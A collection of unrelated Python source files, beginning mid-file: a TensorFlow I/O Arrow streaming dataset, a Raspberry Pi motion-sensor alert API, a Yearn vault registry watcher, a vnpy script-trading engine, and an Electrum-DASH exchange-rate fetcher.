output_types, output_shapes = arrow_schema_to_tensor_types(schema)
return cls(
endpoints, columns, output_types, output_shapes, batch_size, batch_mode
)
@classmethod
def from_record_batches(
cls,
record_batch_iter,
output_types,
output_shapes=None,
columns=None,
batch_size=None,
batch_mode="keep_remainder",
record_batch_iter_factory=None,
):
"""Create an ArrowStreamDataset by serving a sequence of Arrow record
batches in a background thread. This constructor requires pyarrow to
be installed.
Args:
record_batch_iter: A sequence or iterator of Arrow record batches
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
columns: Optional list of column indices to be used, if None all are used
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
record_batch_iter_factory: Optional factory to create additional record
batch iterators for multiple iterations.
"""
import pyarrow as pa # pylint: disable=import-outside-toplevel
# Create a UDS server by default if not Windows
if os.name != "nt":
sock_path = os.path.join(tempfile.gettempdir(), "arrow_io_stream.sock")
endpoint = f"unix://{sock_path}"
try:
os.unlink(sock_path)
except OSError:
if os.path.exists(sock_path):
raise
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(sock_path)
# Create a TCP server
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("127.0.0.1", 0))
host_addr, port = sock.getsockname()
endpoint = f"{host_addr}:{port}"
sock.listen(1)
def run_server():
"""serve record batches"""
curr_iter = record_batch_iter
while True:
conn, _ = sock.accept()
outfile = conn.makefile(mode="wb")
writer = None
try:
for batch in curr_iter:
if writer is None:
writer = pa.RecordBatchStreamWriter(outfile, batch.schema)
writer.write_batch(batch)
if record_batch_iter_factory is not None:
curr_iter = record_batch_iter_factory()
finally:
if writer is not None:
writer.close()
outfile.close()
conn.close()
sock.close()
# Run the server in a thread
server = threading.Thread(target=run_server)
server.daemon = True
server.start()
if columns is None:
columns = list(range(len(output_types)))
return cls(
endpoint, columns, output_types, output_shapes, batch_size, batch_mode
)
@classmethod
def from_pandas(
cls, data_frames, columns=None, preserve_index=True, batch_size=None
):
"""Create an ArrowStreamDataset by serving a DataFrame, or batches of a
DataFrame in a background thread. This constructor requires pandas and
pyarrow to be installed.
Args:
data_frames: A Pandas DataFrame or sequence of DataFrames
columns: Optional column indices to use, if None all are used
preserve_index: Flag to include the DataFrame index as the last column
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: Currently, only 'keep_remainder' batch mode supported
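        Example (a minimal sketch; the DataFrame is hypothetical and pandas/
        pyarrow are assumed to be installed):
            import pandas as pd
            df = pd.DataFrame({"x": list(range(10))})
            ds = ArrowStreamDataset.from_pandas(df, batch_size=4)
            # Record batches of 4 rows are served over a local socket in a
            # background thread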
"""
import pandas as pd # pylint: disable=import-outside-toplevel
import pyarrow as pa # pylint: disable=import-outside-toplevel
if isinstance(data_frames, pd.DataFrame):
data_frames = [data_frames]
def gen_record_batches():
"""record batch generator"""
for df in data_frames:
if columns is not None:
df = df.iloc[:, list(columns)]
# If batching, slice DataFrame and convert to record batches
if batch_size is not None:
# Pandas will produce a partial batch if there is a remainder
for i in range(0, len(df), batch_size):
df_slice = df[i : i + batch_size]
batch = pa.RecordBatch.from_pandas(
df_slice, preserve_index=preserve_index
)
yield batch
# Not batching, convert entire DataFrame to one record batch
else:
batch = pa.RecordBatch.from_pandas(
df, preserve_index=preserve_index
)
yield batch
# Get first batch to convert schema to output types and shapes
record_batch_iter = gen_record_batches()
batch = next(record_batch_iter)
output_types, output_shapes = arrow_schema_to_tensor_types(batch.schema)
return cls.from_record_batches(
chain([batch], record_batch_iter),
output_types,
output_shapes,
batch_size=batch_size,
batch_mode="keep_remainder",
record_batch_iter_factory=gen_record_batches,
)
def list_feather_columns(filename, **kwargs):
"""list_feather_columns"""
if not tf.executing_eagerly():
raise NotImplementedError("list_feather_columns only support eager mode")
memory = kwargs.get("memory", "")
columns, dtypes_, shapes = core_ops.io_list_feather_columns(filename, memory=memory)
entries = zip(tf.unstack(columns), tf.unstack(dtypes_), tf.unstack(shapes))
return {
column.numpy().decode(): tf.TensorSpec(
shape.numpy(), dtype.numpy().decode(), column.numpy().decode()
)
for (column, dtype, shape) in entries
}
|
pir-api.py
|
from flask import Flask, jsonify, g
from flask_cors import CORS
import RPi.GPIO as GPIO
import sys, ctypes, os, logging
from time import gmtime, localtime, strftime, sleep
from datetime import datetime, timedelta
import sqlite3
from multiprocessing import Process, Queue
from dotenv import load_dotenv
import smtplib
from email.mime.text import MIMEText
# flush all out and load .env file
sys.stdout.flush()
load_dotenv()
DATABASE = '/home/pi/pir-api.db'
GPIO_LED = 24 # Pin 18
GPIO_PIR = 27 # Pin 13
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(GPIO_LED, GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(GPIO_PIR, GPIO.IN)
PIR_TIMEOUT = 5*60 # 5 mins
app = Flask(__name__)
CORS(app)
q = Queue()
if __name__ != '__main__':
gunicorn_logger = logging.getLogger('gunicorn.error')
app.logger.handlers = gunicorn_logger.handlers
app.logger.setLevel(gunicorn_logger.level)
def get_db():
db = getattr(g, '_database', None)
if db is None:
db = g._database = sqlite3.connect(DATABASE)
return db
@app.teardown_appcontext
def close_connection(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
def init_db():
with app.app_context():
db = get_db()
with app.open_resource('./schema.sql', mode='r') as f:
db.cursor().executescript(f.read())
db.commit()
def query_db(query, args=(), one=False):
cur = get_db().execute(query, args)
rv = cur.fetchall()
cur.close()
return (rv[0] if rv else None) if one else rv
def replace_db(table, fields=(), values=()):
db = get_db()
cur = db.cursor()
query = 'REPLACE INTO %s (%s) VALUES (%s)' % (
table,
', '.join(fields),
', '.join(['?'] * len(values))
)
cur.execute(query, values)
db.commit()
id = cur.lastrowid
cur.close()
return id
def update_last():
now = datetime.now()
lastT = now.strftime('%H:%M')
lastD = now.strftime('%Y-%m-%d')
with app.app_context():
replace_db('_last', ['id', 'lastD', 'lastT'], [1, lastD, lastT])
def get_last():
last = query_db("SELECT lastT, lastD FROM _last WHERE id = 1", one=True)
lastT, lastD = last
mins = int(os.getenv('ALERT_AFTER_MINS'))
alert_hm = "%02d:%02d" % (mins/60, mins%60)
now = datetime.now()
active = get_active(now)
app.logger.debug('Last: %s %s, timeout: %s' % (lastD, lastT, alert_hm))
return {
'date': lastD,
'time': lastT,
        'timeout': alert_hm,  # in hours and mins
'active': str(active) # active state
}
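# Map an hour of day to one of five 3-hour segments between 06:00 and 21:00;
# hours outside that window return -1.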
def h_index(h):
    if 6 <= h < 9:
        return 0
    elif 9 <= h < 12:
        return 1
    elif 12 <= h < 15:
        return 2
    elif 15 <= h < 18:
        return 3
    elif 18 <= h < 21:
        return 4
    return -1
def clear_motions(lastIndex):
index = h_index(int(datetime.now().strftime('%H')))
    if index == lastIndex or index < 0:
        return index
with app.app_context():
motions = get_motions()
motions[index] = 0
app.logger.debug('Clear motions: %s' % motions[0:5])
with app.app_context():
replace_db('_motions', ['id', 'motions'], [1, ','.join([str(i) for i in motions])])
return index
def update_motions():
index = h_index(int(datetime.now().strftime('%H')))
with app.app_context():
motions = get_motions()
if index >= 0:
motions[index] += 1
with app.app_context():
replace_db('_motions', ['id', 'motions'], [1, ','.join([str(i) for i in motions])])
app.logger.debug('Update motions: %s' % motions[0:5])
def get_motions():
motions = query_db("SELECT motions FROM _motions WHERE id = 1", one=True)
    if motions is None:
motions = [0, 0, 0, 0, 0, 0]
else:
motions = list(map(int, motions[0].split(',')))
return motions
def send_email(to, subject, body):
SMTP_SERVER = os.getenv('SMTP_SERVER')
SMTP_LOGIN = os.getenv('SMTP_LOGIN')
SMTP_PASSWD = os.getenv('SMTP_PASSWD')
server = smtplib.SMTP(SMTP_SERVER, 587)
server.ehlo()
server.starttls()
server.ehlo()
# Next, log in to the server
server.login(SMTP_LOGIN, SMTP_PASSWD)
msg = MIMEText(body)
msg['From'] = 'noreply@' + SMTP_SERVER
msg['To'] = to
msg['Subject'] = subject
# Send the mail
server.send_message(msg)
server.quit()
def pir_callback(channel):
q.put(datetime.now())
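# The UPTIME env var is expected in "HH:MM-HH:MM" format and defines the
# daily window in which warn/alert e-mails may be sent.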
def get_uptime():
uptimes = os.getenv('UPTIME').split('-')
_from = uptimes[0].split(':')
_to = uptimes[1].split(':')
return list(map(int, _from)) + list( map(int, _to))
def get_active(now):
fromH, fromM, toH, toM = get_uptime()
_from = now.replace(hour=fromH, minute=fromM, second=0)
_to = now.replace(hour=toH, minute=toM, second=0)
    return _from < now < _to
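# Main PIR worker loop: registers motions from the queue (rate-limited by
# PIR_TIMEOUT) and sends warn/alert e-mails when no motion has been seen for
# the configured WARN_AFTER_MINS / ALERT_AFTER_MINS intervals.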
def pir_loop(q):
lastTrigger, lastIndex, cnt = datetime(1970, 1, 1), 0, 0
warn_sent, alert_sent = True, True
GPIO.add_event_detect(GPIO_PIR, GPIO.RISING)
GPIO.add_event_callback(GPIO_PIR, pir_callback)
alert_delay = int(os.getenv('ALERT_AFTER_MINS')) * 60
warn_delay = int(os.getenv('WARN_AFTER_MINS')) * 60
app.logger.info("New thread waiting for PIR motions")
while True:
if not q.empty():
# a motion was detected
trigger = q.get()
# obey motion timeout
if lastTrigger + timedelta(0, PIR_TIMEOUT) < trigger:
app.logger.debug("** New motion detected and registered")
update_last()
update_motions()
lastTrigger = trigger
warn_sent, alert_sent = False, False
else:
# motion detected but not registered
app.logger.debug("New motion detected but not registered")
else:
now = datetime.now()
# reset motions counter when in new duration segment
lastIndex = clear_motions(lastIndex)
active = get_active(now)
if active:
if not warn_sent and (lastTrigger + timedelta(0, warn_delay) < now):
warn_emails = os.getenv('WARN_EMAILS_TO').split(',')
app.logger.info("Send Warn E-Mails to %s" % warn_emails)
for email in warn_emails:
send_email(email, "MoMo-Warning",
os.getenv('WARN_EMAIL_BODY'))
warn_sent = True
if not alert_sent and (lastTrigger + timedelta(0, alert_delay) < now):
alert_emails = os.getenv('ALERT_EMAILS_TO').split(',')
app.logger.info("Send Alert E-Mails to %s" % alert_emails)
for email in alert_emails:
send_email(email, "MoMo-Alert",
os.getenv('ALERT_EMAIL_BODY'))
alert_sent = True
if not (cnt % 12):
app.logger.debug("PIR loop still is executing (%06dm - %sactive)" %
(cnt/12, "not " if not active else ""))
sys.stdout.flush()
cnt += 1
sleep(5)
@app.route('/pir/api/v1/last')
def last():
GPIO.output(GPIO_LED, GPIO.HIGH)
return jsonify(get_last())
@app.route('/pir/api/v1/hourly')
def hourly():
GPIO.output(GPIO_LED, GPIO.LOW)
try:
# Initialize a list of hourly motions
motionList = []
motions = get_motions()
app.logger.debug('Get motions: %s' % motions[0:5])
        # build the list of 3-hour motion count entries
for i in range(0, 6):
motionDict = {
'hour': str(i * 3 + 6),
'count': str(motions[i] if i<5 else '0')
}
motionList.append(motionDict)
except Exception as e:
        print(e, e.args)
return jsonify(motionList)
def main():
init_db()
# start with current date and time
update_last()
app.logger.info("Start PIR server.")
p = Process(target=pir_loop, args=(q, ))
p.start()
# execute only if we do not use gunicorn
if __name__ == '__main__':
app.run(host="0.0.0.0", port=5000, debug=True)
p.join()
main()
|
registry.py
|
import logging
import threading
import time
from typing import List
from brownie import Contract, chain, web3
from joblib import Parallel, delayed
from web3._utils.abi import filter_by_name
from web3._utils.events import construct_event_topic_set
from yearn.events import create_filter, decode_logs, get_logs_asap
from yearn.multicall2 import fetch_multicall
from yearn.prices import magic
from yearn.utils import Singleton, contract_creation_block, contract
from yearn.v2.vaults import Vault
from yearn.networks import Network
from yearn.exceptions import UnsupportedNetwork
from yearn.decorators import sentry_catch_all, wait_or_exit_before, wait_or_exit_after
logger = logging.getLogger(__name__)
class Registry(metaclass=Singleton):
def __init__(self, watch_events_forever=True, include_experimental=True):
        self.releases = {}  # api_version -> template
        self._vaults = {}  # address -> Vault
        self._experiments = {}  # address -> Vault
self.governance = None
self.tags = {}
self._watch_events_forever = watch_events_forever
self.include_experimental = include_experimental
self.registries = self.load_registry()
# load registry state in the background
self._done = threading.Event()
self._has_exception = False
self._thread = threading.Thread(target=self.watch_events, daemon=True)
self._thread.start()
def load_registry(self):
if chain.id == Network.Mainnet:
return self.load_from_ens()
elif chain.id == Network.Gnosis:
return [contract('0xe2F12ebBa58CAf63fcFc0e8ab5A61b145bBA3462')]
elif chain.id == Network.Fantom:
return [contract('0x727fe1759430df13655ddb0731dE0D0FDE929b04')]
elif chain.id == Network.Arbitrum:
return [contract('0x3199437193625DCcD6F9C9e98BDf93582200Eb1f')]
else:
raise UnsupportedNetwork('yearn v2 is not available on this network')
def load_from_ens(self):
# track older registries to pull experiments
resolver = contract('0x4976fb03C32e5B8cfe2b6cCB31c09Ba78EBaBa41')
topics = construct_event_topic_set(
filter_by_name('AddressChanged', resolver.abi)[0],
web3.codec,
{'node': web3.ens.namehash('v2.registry.ychad.eth')},
)
events = decode_logs(get_logs_asap(str(resolver), topics))
logger.info('loaded %d registry versions', len(events))
return [Contract(event['newAddress']) for event in events]
@property
@wait_or_exit_before
def vaults(self) -> List[Vault]:
return list(self._vaults.values())
@property
@wait_or_exit_before
def experiments(self) -> List[Vault]:
return list(self._experiments.values())
@wait_or_exit_before
def __repr__(self) -> str:
return f"<Registry chain={chain.id} releases={len(self.releases)} vaults={len(self.vaults)} experiments={len(self.experiments)}>"
@wait_or_exit_after
def load_vaults(self):
if not self._thread._started.is_set():
self._thread.start()
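    # Background loop: fetch all historical registry logs once, then poll for
    # new entries every 5 minutes (or return after the first pass when
    # watch_events_forever is False).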
@sentry_catch_all
def watch_events(self):
start = time.time()
self.log_filter = create_filter([str(addr) for addr in self.registries])
logs = self.log_filter.get_all_entries()
while True:
self.process_events(decode_logs(logs))
if not self._done.is_set():
self._done.set()
logger.info("loaded v2 registry in %.3fs", time.time() - start)
if not self._watch_events_forever:
return
time.sleep(300)
# read new logs at end of loop
logs = self.log_filter.get_new_entries()
def process_events(self, events):
for event in events:
logger.debug("%s %s %s", event.address, event.name, dict(event))
if event.name == "NewGovernance":
self.governance = event["governance"]
if event.name == "NewRelease":
self.releases[event["api_version"]] = contract(event["template"])
if event.name == "NewVault":
# experiment was endorsed
if event["vault"] in self._experiments:
vault = self._experiments.pop(event["vault"])
vault.name = f"{vault.vault.symbol()} {event['api_version']}"
self._vaults[event["vault"]] = vault
logger.debug("endorsed vault %s %s", vault.vault, vault.name)
# we already know this vault from another registry
elif event["vault"] not in self._vaults:
vault = self.vault_from_event(event)
vault.name = f"{vault.vault.symbol()} {event['api_version']}"
self._vaults[event["vault"]] = vault
logger.debug("new vault %s %s", vault.vault, vault.name)
if self.include_experimental and event.name == "NewExperimentalVault":
vault = self.vault_from_event(event)
vault.name = f"{vault.vault.symbol()} {event['api_version']} {event['vault'][:8]}"
self._experiments[event["vault"]] = vault
logger.debug("new experiment %s %s", vault.vault, vault.name)
if event.name == "VaultTagged":
self.tags[event["vault"]] = event["tag"]
def vault_from_event(self, event):
return Vault(
vault=Contract.from_abi("Vault", event["vault"], self.releases[event["api_version"]].abi),
token=event["token"],
api_version=event["api_version"],
registry=self,
watch_events_forever=self._watch_events_forever,
)
def load_strategies(self):
# stagger loading strategies to not run out of connections in the pool
vaults = self.vaults + self.experiments
Parallel(8, "threading")(delayed(vault.load_strategies)() for vault in vaults)
def load_harvests(self):
vaults = self.vaults + self.experiments
Parallel(8, "threading")(delayed(vault.load_harvests)() for vault in vaults)
def describe(self, block=None):
vaults = self.active_vaults_at(block)
results = Parallel(8, "threading")(delayed(vault.describe)(block=block) for vault in vaults)
return {vault.name: result for vault, result in zip(vaults, results)}
def total_value_at(self, block=None):
vaults = self.active_vaults_at(block)
prices = Parallel(8, "threading")(delayed(magic.get_price)(str(vault.token), block=block) for vault in vaults)
results = fetch_multicall(*[[vault.vault, "totalAssets"] for vault in vaults], block=block)
return {vault.name: assets * price / vault.scale for vault, assets, price in zip(vaults, results, prices)}
def active_vaults_at(self, block=None):
vaults = self.vaults + self.experiments
if block:
vaults = [vault for vault in vaults if contract_creation_block(str(vault.vault)) <= block]
# fixes edge case: a vault is not necessarily initialized on creation
activations = fetch_multicall(*[[vault.vault, 'activation'] for vault in vaults], block=block)
return [vault for vault, activation in zip(vaults, activations) if activation]
def wallets(self, block=None):
        return {wallet for vault in self.active_vaults_at(block) for wallet in vault.wallets(block)}
|
engine.py
|
import sys
import importlib
import traceback
from typing import Optional, Sequence, Any, List
from pathlib import Path
from datetime import datetime
from threading import Thread
from pandas import DataFrame
from vnpy.event import Event, EventEngine
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.constant import Direction, Offset, OrderType, Interval
from vnpy.trader.object import (
BaseData,
OrderRequest,
HistoryRequest,
SubscribeRequest,
TickData,
OrderData,
TradeData,
PositionData,
AccountData,
ContractData,
LogData,
BarData,
CancelRequest
)
from vnpy.trader.datafeed import BaseDatafeed, get_datafeed
APP_NAME: str = "ScriptTrader"
EVENT_SCRIPT_LOG: str = "eScriptLog"
class ScriptEngine(BaseEngine):
""""""
setting_filename: str = "script_trader_setting.json"
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super().__init__(main_engine, event_engine, APP_NAME)
self.strategy_active: bool = False
        self.strategy_thread: Optional[Thread] = None
self.datafeed: BaseDatafeed = get_datafeed()
def init(self) -> None:
"""启动策略引擎"""
result: bool = self.datafeed.init()
if result:
self.write_log("数据服务初始化成功")
def start_strategy(self, script_path: str) -> None:
"""运行策略线程中的策略方法"""
if self.strategy_active:
return
self.strategy_active: bool = True
self.strategy_thread: Thread = Thread(
target=self.run_strategy, args=(script_path,))
self.strategy_thread.start()
self.write_log("策略交易脚本启动")
def run_strategy(self, script_path: str) -> None:
"""加载策略脚本并调用run函数"""
path: Path = Path(script_path)
sys.path.append(str(path.parent))
script_name: str = path.parts[-1]
module_name: str = script_name.replace(".py", "")
try:
module = importlib.import_module(module_name)
importlib.reload(module)
module.run(self)
except Exception:
msg: str = f"触发异常已停止\n{traceback.format_exc()}"
self.write_log(msg)
def stop_strategy(self) -> None:
"""停止运行中的策略"""
if not self.strategy_active:
return
self.strategy_active: bool = False
if self.strategy_thread:
self.strategy_thread.join()
        self.strategy_thread = None
self.write_log("策略交易脚本停止")
def connect_gateway(self, setting: dict, gateway_name: str) -> None:
""""""
self.main_engine.connect(setting, gateway_name)
def send_order(
self,
vt_symbol: str,
price: float,
volume: float,
direction: Direction,
offset: Offset,
order_type: OrderType
) -> str:
""""""
contract: Optional[ContractData] = self.get_contract(vt_symbol)
if not contract:
return ""
req: OrderRequest = OrderRequest(
symbol=contract.symbol,
exchange=contract.exchange,
direction=direction,
type=order_type,
volume=volume,
price=price,
offset=offset,
reference=APP_NAME
)
vt_orderid: str = self.main_engine.send_order(req, contract.gateway_name)
return vt_orderid
def subscribe(self, vt_symbols) -> None:
""""""
for vt_symbol in vt_symbols:
contract: Optional[ContractData] = self.main_engine.get_contract(vt_symbol)
if contract:
req: SubscribeRequest = SubscribeRequest(
symbol=contract.symbol,
exchange=contract.exchange
)
self.main_engine.subscribe(req, contract.gateway_name)
def buy(
self,
vt_symbol: str,
price: float,
volume: float,
order_type: OrderType = OrderType.LIMIT
) -> str:
""""""
return self.send_order(vt_symbol, price, volume, Direction.LONG, Offset.OPEN, order_type)
def sell(
self,
vt_symbol: str,
price: float,
volume: float,
order_type: OrderType = OrderType.LIMIT
) -> str:
""""""
return self.send_order(vt_symbol, price, volume, Direction.SHORT, Offset.CLOSE, order_type)
def short(
self,
vt_symbol: str,
price: float,
volume: float,
order_type: OrderType = OrderType.LIMIT
) -> str:
""""""
return self.send_order(vt_symbol, price, volume, Direction.SHORT, Offset.OPEN, order_type)
def cover(
self,
vt_symbol: str,
price: float,
volume: float,
order_type: OrderType = OrderType.LIMIT
) -> str:
""""""
return self.send_order(vt_symbol, price, volume, Direction.LONG, Offset.CLOSE, order_type)
def cancel_order(self, vt_orderid: str) -> None:
""""""
order: Optional[OrderData] = self.get_order(vt_orderid)
if not order:
return
req: CancelRequest = order.create_cancel_request()
self.main_engine.cancel_order(req, order.gateway_name)
def get_tick(self, vt_symbol: str, use_df: bool = False) -> TickData:
""""""
return get_data(self.main_engine.get_tick, arg=vt_symbol, use_df=use_df)
def get_ticks(self, vt_symbols: Sequence[str], use_df: bool = False) -> Sequence[TickData]:
""""""
ticks: list = []
for vt_symbol in vt_symbols:
tick: TickData = self.main_engine.get_tick(vt_symbol)
ticks.append(tick)
if not use_df:
return ticks
else:
return to_df(ticks)
def get_order(self, vt_orderid: str, use_df: bool = False) -> OrderData:
""""""
return get_data(self.main_engine.get_order, arg=vt_orderid, use_df=use_df)
def get_orders(self, vt_orderids: Sequence[str], use_df: bool = False) -> Sequence[OrderData]:
""""""
orders: list = []
for vt_orderid in vt_orderids:
order: OrderData = self.main_engine.get_order(vt_orderid)
orders.append(order)
if not use_df:
return orders
else:
return to_df(orders)
def get_trades(self, vt_orderid: str, use_df: bool = False) -> Sequence[TradeData]:
""""""
trades: list = []
all_trades: List[TradeData] = self.main_engine.get_all_trades()
for trade in all_trades:
if trade.vt_orderid == vt_orderid:
trades.append(trade)
if not use_df:
return trades
else:
return to_df(trades)
def get_all_active_orders(self, use_df: bool = False) -> Sequence[OrderData]:
""""""
return get_data(self.main_engine.get_all_active_orders, use_df=use_df)
def get_contract(self, vt_symbol, use_df: bool = False) -> ContractData:
""""""
return get_data(self.main_engine.get_contract, arg=vt_symbol, use_df=use_df)
def get_all_contracts(self, use_df: bool = False) -> Sequence[ContractData]:
""""""
return get_data(self.main_engine.get_all_contracts, use_df=use_df)
def get_account(self, vt_accountid: str, use_df: bool = False) -> AccountData:
""""""
return get_data(self.main_engine.get_account, arg=vt_accountid, use_df=use_df)
def get_all_accounts(self, use_df: bool = False) -> Sequence[AccountData]:
""""""
return get_data(self.main_engine.get_all_accounts, use_df=use_df)
def get_position(self, vt_positionid: str, use_df: bool = False) -> PositionData:
""""""
return get_data(self.main_engine.get_position, arg=vt_positionid, use_df=use_df)
def get_all_positions(self, use_df: bool = False) -> Sequence[PositionData]:
""""""
return get_data(self.main_engine.get_all_positions, use_df=use_df)
def get_bars(
self,
vt_symbol: str,
start_date: str,
interval: Interval,
use_df: bool = False
) -> Sequence[BarData]:
""""""
contract: Optional[ContractData] = self.main_engine.get_contract(vt_symbol)
if not contract:
return []
start: datetime = datetime.strptime(start_date, "%Y%m%d")
end: datetime = datetime.now()
req: HistoryRequest = HistoryRequest(
symbol=contract.symbol,
exchange=contract.exchange,
start=start,
end=end,
interval=interval
)
return get_data(self.datafeed.query_bar_history, arg=req, use_df=use_df)
def write_log(self, msg: str) -> None:
""""""
log: LogData = LogData(msg=msg, gateway_name=APP_NAME)
print(f"{log.time}\t{log.msg}")
event: Event = Event(EVENT_SCRIPT_LOG, log)
self.event_engine.put(event)
def send_email(self, msg: str) -> None:
""""""
subject: str = "脚本策略引擎通知"
self.main_engine.send_email(subject, msg)
def to_df(data_list: Sequence) -> Optional[DataFrame]:
""""""
if not data_list:
return None
dict_list: list = [data.__dict__ for data in data_list]
return DataFrame(dict_list)
def get_data(func: callable, arg: Any = None, use_df: bool = False) -> BaseData:
""""""
if not arg:
data = func()
else:
data = func(arg)
if not use_df:
return data
elif data is None:
return data
else:
if not isinstance(data, list):
data = [data]
return to_df(data)
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0,
# Not ISO 4217.
'BTC': 8}
DEFAULT_EXCHANGE = 'Bittrex'
DEFAULT_CCY = 'BTC'
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={
'User-Agent': 'Electrum-DASH'
})
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={
'User-Agent': 'Electrum-DASH'
})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
        t.daemon = True
t.start()
def get_historical_rates_safe(self, ccy):
try:
self.print_error("requesting fx history for", ccy)
self.history[ccy] = self.historical_rates(ccy)
self.print_error("received fx history for", ccy)
self.on_history()
except BaseException as e:
self.print_error("failed fx history:", e)
def get_historical_rates(self, ccy):
result = self.history.get(ccy)
if not result and ccy in self.history_ccys():
t = Thread(target=self.get_historical_rates_safe, args=(ccy,))
            t.daemon = True
t.start()
return result
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'))
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class Bittrex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bittrex.com',
'/api/v1.1/public/getticker?market=BTC-DASH')
quote_currencies = {}
if not json.get('success', False):
return quote_currencies
last = Decimal(json['result']['Last'])
quote_currencies['BTC'] = last
return quote_currencies
class Poloniex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('poloniex.com', '/public?command=returnTicker')
quote_currencies = {}
dash_ticker = json.get('BTC_DASH')
quote_currencies['BTC'] = Decimal(dash_ticker['last'])
return quote_currencies
class CoinMarketCap(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinmarketcap.com', '/v1/ticker/dash/')
quote_currencies = {}
if not isinstance(json, list):
return quote_currencies
json = json[0]
for ccy, key in [
('USD', 'price_usd'),
('BTC', 'price_btc'),
]:
quote_currencies[ccy] = Decimal(json[key])
return quote_currencies
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r') as f:
return json.loads(f.read())
    except Exception:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
        except Exception:
continue
with open(path, 'w') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.set_exchange(self.config_exchange())
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
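    # Called periodically from the plugins thread: history is refreshed once
    # after the timeout has been reset to 0, spot quotes roughly every 150 seconds.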
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
            if self.timeout == 0 and self.show_history():
self.exchange.get_historical_rates(self.ccy)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", DEFAULT_CCY)
def config_exchange(self):
return self.config.get('use_exchange', DEFAULT_EXCHANGE)
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, Bittrex)
self.print_error("using exchange", name)
